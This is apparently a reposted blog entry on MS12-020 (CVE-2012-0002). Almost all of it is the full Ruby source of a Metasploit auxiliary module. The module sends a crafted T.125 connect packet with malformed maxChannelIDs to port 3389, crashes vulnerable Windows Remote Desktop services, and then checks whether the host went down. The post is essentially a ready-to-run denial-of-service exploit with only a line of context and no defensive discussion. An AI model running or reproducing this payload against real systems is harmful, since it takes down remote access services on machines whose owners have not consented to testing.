MS12-020 RDP DoS From Metasploit
Published: 2019-06-14


The MS12-020 exploit: an Italian researcher reported it to Microsoft, and then...

http://aluigi.org/adv/termdd_1-adv.txt

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Auxiliary::Report
	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',
			'Description'    => %q{
				This module exploits the MS12-020 RDP vulnerability originally discovered and
				reported by Luigi Auriemma.  The flaw can be found in the way the T.125
				ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result
				in an invalid pointer being used, therefore causing a denial-of-service condition.
			},
			'References'     =>
				[
					[ 'CVE', '2012-0002' ],
					[ 'MSB', 'MS12-020' ],
					[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
					[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
					[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
					[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/18606/' ]
				],
			'Author'         =>
				[
					'Luigi Auriemma',
					'Daniel Godas-Lopez',  # Entirely based on Daniel's pastie
					'Alex Ionescu',
					'jduck',
					'#ms12-020'            # Freenode IRC
				],
			'License'        => MSF_LICENSE,
			'DisclosureDate' => "Mar 16 2012"
		))

		register_options(
			[
				Opt::RPORT(3389)
			], self.class)
	end

	# Probe the target port: a successful TCP connect means RDP is still listening.
	def is_rdp_up
		begin
			connect
			return true
		rescue Rex::ConnectionRefused
			return false
		rescue Rex::ConnectionTimeout
			return false
		end
	end

	def run
		max_channel_ids = "\x02\x01\xff"

		pkt = ''+
			"\x03\x00\x00\x13" +  # TPKT: version + length
			"\x0E\xE0\x00\x00" +  # X.224 (connection request)
			"\x00\x00\x00\x01" +
			"\x00\x08\x00\x00" +
			"\x00\x00\x00"     +
			"\x03\x00\x00\x6A" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224 (connect-initial)
			"\x7F\x65\x82\x00" +  # T.125
			"\x5E"             +
			"\x04\x01\x01"     +  # callingDomainSelector
			"\x04\x01\x01"     +  # calledDomainSelector
			"\x01\x01\xFF"     +  # upwardFlag
			"\x30\x19"         +  # targetParameters
			max_channel_ids    +  # maxChannelIds
			"\x02\x01\xFF"     +  # maxUserIds
			"\x02\x01\x00"     +  # maxTokenIds
			"\x02\x01\x01"     +  # numPriorities
			"\x02\x01\x00"     +  # minThroughput
			"\x02\x01\x01"     +  # maxHeight
			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
			"\x02\x01\x02"     +  # protocolVersion
			"\x30\x19"         +  # minimumParameters
			max_channel_ids    +  # maxChannelIds
			"\x02\x01\xFF"     +  # maxUserIds
			"\x02\x01\x00"     +  # maxTokenIds
			"\x02\x01\x01"     +  # numPriorities
			"\x02\x01\x00"     +  # minThroughput
			"\x02\x01\x01"     +  # maxHeight
			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
			"\x02\x01\x02"     +  # protocolVersion
			"\x30\x19"         +  # maximumParameters
			max_channel_ids    +  # maxChannelIds
			"\x02\x01\xFF"     +  # maxUserIds
			"\x02\x01\x00"     +  # maxTokenIds
			"\x02\x01\x01"     +  # numPriorities
			"\x02\x01\x00"     +  # minThroughput
			"\x02\x01\x01"     +  # maxHeight
			"\x02\x02\x00\x7C" +  # maxMCSPDUsize
			"\x02\x01\x02"     +  # protocolVersion
			"\x04\x82\x00\x00" +  # userData
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x08" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x28"             +  # T.125
			"\x03\x00\x00\x0C" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x38\x00\x06\x03" +  # T.125
			"\xF0"             +
			"\x03\x00\x00\x09" +  # TPKT: version + length
			"\x02\xF0\x80"     +  # X.224
			"\x21\x80"            # T.125

		connect
		print_status("#{rhost}:#{rport} - Sending #{self.name}")
		sock.put(pkt)
		select(nil, nil, nil, 3)
		disconnect

		print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")
		print_status("#{rhost}:#{rport} - Checking RDP status...")

		if not is_rdp_up
			print_good("#{rhost}:#{rport} seems down")
			report_vuln({
				:host => rhost,
				:port => rport,
				:name => self.fullname,
				:refs => self.references
			})
		else
			print_status("#{rhost}:#{rport} is still up")
		end
	end
end
```

 

Reposted from: https://www.cnblogs.com/sp1d3r/archive/2012/03/23/2413707.html
